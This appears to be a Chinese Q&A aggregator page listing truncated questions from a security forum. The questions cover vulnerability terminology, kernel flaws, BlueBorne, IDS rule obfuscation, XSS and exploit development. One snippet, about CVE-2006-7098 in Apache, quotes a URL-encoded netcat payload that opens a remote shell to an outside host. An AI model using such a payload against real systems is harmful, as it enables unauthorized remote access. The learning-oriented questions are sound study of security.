我很难找出攻击矢量/攻击面/漏洞和利用之间的区别。根据维基百科(漏洞)
若要攻击漏洞,攻击者必须至少有一个可用于连接到系统缺陷的工具或技术。在此框架中,漏洞</em
浏览 0提问于2015-06-04得票数 25
回答已采纳
我的问题与允许安装Linux内核级rootkit的漏洞有关(例如,修改内核内部的执行流;针对面向返回的攻击;或修改某些结构以隐藏某些进程)。在下面的站点中,我发现了迄今为止公开的Linux内核漏洞的一个很好的分类:当我注意到2011年没有(公开知道的)代码执行漏洞时,我感到有点惊讶。
这是否意味着不能利用该表中的其他漏洞</e
浏览 0提问于2011-12-05得票数 16
我试图发现的第一件事是使用戊四氮:程序是否在用户下运行(例如,在根用户下运行的程序不应该运行)
对于嵌入式Linux设备,是否有任何框架/工具可以用来发现上述两个方面的缺陷我正在努力发现基本的漏洞并修复这些漏洞。
浏览 0提问于2017-07-06得票数 0
回答已采纳
1回答
我要问的是,攻击是否被认为是利用特定漏洞,还是可以说多个漏洞利用了单个漏洞。例如,我们知道SQL通过SQL注入攻击有许多类型的攻击。我们是说SQL中通过发送意外命令来操作的漏洞本身就是漏洞,还是能够执行攻击操作的特定命令就是漏洞,这意味着它是1:1而不是1:*关系?
浏览 0提问于2015-05-04得票数 0
1回答
模糊IDS规则
、、
是否存在混淆IDS规则的已知技术,因此攻击者不能轻易地使用它们来反向设计他们检测到的漏洞?
让我提供一些背景情况。有时,IDS供应商会意识到零日漏洞(一个尚未公开披露的漏洞)。在这种情况下,人们可以制定一项规则来检测利用该漏洞并将其推给每个人,试图防止利用该漏洞.但这带来了新的风险。特别是,攻击者可能能够分析IDS规则并使用该规则获取一些线索,从而使攻击者更容易识别漏洞并开始使用该漏洞攻击其他系统。
浏览 0提问于2014-08-21得票数 3
1回答
Linux披露了基于Linux的BlueBorne攻击操作系统中的两个漏洞,这些漏洞允许攻击者完全控制受感染的设备。第一个漏洞是信息泄漏漏洞,它可以帮助攻击者确定目标设备使用的确切版本,并相应地调整他的漏洞。第二种是堆栈溢出,可以导致设备的完全控制。
例如,所有启用蓝牙的设备都应该被标记为恶意设备。此攻击不需要任何用户交互、身份验证或配对,使其几乎不可见。所有运行BlueZ的Linux设备都受到信息泄漏漏洞(CVE-
浏览 0提问于2017-09-13得票数 20
回答已采纳
Nessus扫描了很多漏洞,所以我应该集中学习Nessus没有涵盖的漏洞,比如目录遍历攻击吗?我应该只研究Nessus没有覆盖的漏洞,或者学习所有的漏洞,无论Nessus是否覆盖。这两个问题是:
Nessus没有给出它可以找到的漏洞列表(它检查的所有漏洞,后来告诉我们它容易受到这些漏洞的攻击)。我们不知道Nessus的效率有多高(就像XSS攻击一样,OWASP上有大量的过滤器规避方法,我不知道Nessus涵盖了其中的
浏览 0提问于2016-04-30得票数 4
回答已采纳
背景链接:您可以找到在DAO上安装递归调用漏洞攻击涉及哪些帐户?中使用的帐户列表。您可以找到攻击发生在有任何方法可以确定DAO攻击者部署攻击所用的时间吗?中的时间段。
对DAO攻击的垃圾邮件反击是为了减缓攻击速度吗?
浏览 0提问于2016-06-23得票数 4
回答已采纳
2回答
假设一个网站有两个漏洞:反射XSS怎样才是最合适的方法来展示这些弱点?关于集思广益,我想说至少有三种选择:将这两个漏洞合并为一个具有很大影响的漏洞。
有三个漏洞,最初的两个加上两个链接时受影响的关键功能。第一个选项看起来不合适,第三个选项,列出一个额外的漏洞可能是多余的。第二个选项看起来不算太糟,但如果两个漏洞</em
浏览 0提问于2019-12-11得票数 2
我正在研究Apache的旧版本1.3.34的漏洞。我也不太明白在什么情况下CVE2006-7098漏洞可以被利用。nc%20myhost%2031337%20-e%20%2fbin%2f/sh%0d编译了cgipwn漏洞并将其安装在攻击者计算机apache的cgipwn中。从攻击者机器执行nc命令,指定-p作
浏览 0提问于2015-06-03得票数 0
回答已采纳
2回答
我一直在阅读Java反序列化漏洞,该漏洞会导致远程代码执行攻击。许多公开的功绩甚至可以用来进行攻击。
我没有找到任何描述攻击者如何利用该漏洞的教程。
浏览 0提问于2017-07-07得票数 1
3回答
今天,恶意软件的传播主要得益于浏览器及其插件中的漏洞。攻击者使用JavaScript攻击这些漏洞。这类攻击的两个例子是按驱动下载、缓冲区和堆栈溢出攻击。这两次攻击有什么区别?
浏览 0提问于2014-08-14得票数 0
回答已采纳
即使在非隐式流中,防止CSRF攻击()似乎也是相当重要的。
我是不是遗漏了一些东西,表明state参数不是绝对必要的?似乎应该在文档中强调这一点,这样人们就不会留下CSRF漏洞。
浏览 0提问于2015-11-20得票数 3
1回答
我正在利用这里中的一个漏洞。
利用漏洞可以很好地工作,但是我想找出导致漏洞的代码,它是RET覆盖基攻击,RET地址被覆盖到shell代码。我想知道易受攻击的函数epilog和prelog。
浏览 0提问于2018-02-11得票数 2
我们已经确定我们的项目易受JQuery跨站点脚本漏洞的影响。
为了缓解这个问题,我们建议将JQuery升级到3.0.0。
jQuery 1.x实际上不安全吗?
浏览 3提问于2016-06-30得票数 2
回答已采纳
2回答
为了研究SIP服务器的漏洞以及DOS攻击对QoS of VoIP服务的影响,我发现此漏洞可以被利用在SIP服务器上引发DoS。攻击者如何可能造成溢出?OpenSER上可能发生的溢出攻击和拒绝服务攻击之间的关系是什么?
我不了解攻击者的描述和执行的操作。
浏览 0提问于2012-06-22得票数 0
回答已采纳
1回答
从希望针对某个软件应用程序或目标开发零天攻击的人的角度来看,攻击者必须执行以下两项任务:(1)在软件中发现新的可利用漏洞;(2)为该漏洞开发可靠的武器化攻击。例如,模糊分析、反向分析和静态分析可能有助于发现漏洞;但是,构建一个可靠的漏洞需要进行单独的分析和工作。
这两项任务中哪一项的平均成本更高?我想知道这两项任务的经济状况是什么,并了解成本的比例。我知道,如果您查看单个漏洞,代价将取决于漏洞,但我要问的是一般情况。例如,如果我们看一
浏览 0提问于2016-03-23得票数 6
扫码
添加站长 进交流群
领取专属 10元无门槛券
手把手带您无忧上云
相关资讯
热门标签
云服务器
ICP备案
云直播
对象存储
腾讯会议活动推荐
腾讯云开发者
